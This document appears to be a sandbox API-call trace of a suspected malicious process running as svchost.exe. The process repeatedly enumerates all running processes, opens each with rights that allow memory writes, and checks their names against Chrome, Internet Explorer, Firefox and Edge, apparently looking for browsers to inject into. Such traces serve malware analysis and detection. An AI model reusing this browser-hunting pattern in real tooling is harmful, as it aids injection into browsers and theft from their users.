	[0247.354] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.355] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x98a0
	[0247.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.355] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.356] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.356] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.356] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.356] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.357] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.358] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x98a4
	[0247.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.359] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.359] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.359] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.360] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.360] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.361] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x98a8
	[0247.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.361] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.362] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.362] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.363] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.363] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0247.364] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x98ac
	[0247.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.364] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0247.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.365] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.366] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0247.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.366] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.366] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.367] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x98b0
	[0247.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.368] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.368] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.368] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.369] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.369] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.371] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x98b4
	[0247.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.371] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.371] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.372] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.372] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.372] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0247.373] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x98b8
	[0247.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.373] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0247.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.373] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.374] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0247.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.374] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.374] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0247.375] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x98bc
	[0247.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.375] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.375] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.376] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.376] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.376] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0247.377] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x98c0
	[0247.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.377] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0247.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.377] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.377] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0247.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.378] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.378] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.379] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x98c4
	[0247.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.379] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.379] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.379] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.380] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.380] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0247.381] CloseHandle (hObject=0x4fd0) returned 1
	[0247.381] Sleep (dwMilliseconds=0x64) 
	[0247.482] GetCurrentProcessId () returned 0x110
	[0247.482] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0247.488] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0247.489] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0247.490] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0247.491] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x98c8
	[0247.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.491] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0247.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.491] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.492] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0247.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.492] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.492] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0247.493] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x98cc
	[0247.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.493] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0247.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.493] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.494] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0247.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.494] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.494] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0247.496] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x98d0
	[0247.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.496] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0247.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.496] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.497] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0247.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.497] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.497] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0247.498] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x98d4
	[0247.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.498] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0247.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.499] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.499] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0247.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.499] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.499] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0247.500] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x98d8
	[0247.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.500] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0247.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.501] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.501] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0247.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.501] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.501] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0247.502] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x98dc
	[0247.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.502] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0247.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.503] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.503] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0247.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.503] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.504] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0247.504] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x98e0
	[0247.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.505] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0247.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.505] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.505] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0247.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.506] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.506] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0247.506] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x98e4
	[0247.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.507] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0247.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.507] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.507] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0247.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.507] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.508] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.508] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x98e8
	[0247.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.508] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.509] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.509] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.509] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.510] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.519] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x98ec
	[0247.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.519] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.520] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.520] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.520] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.521] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.521] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x98f0
	[0247.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.522] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.522] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.522] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.523] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.523] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.524] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x98f4
	[0247.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.524] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.524] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.524] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.525] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.525] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.529] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x98f8
	[0247.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.529] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.529] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.530] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.530] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.530] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.531] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x98fc
	[0247.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.531] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
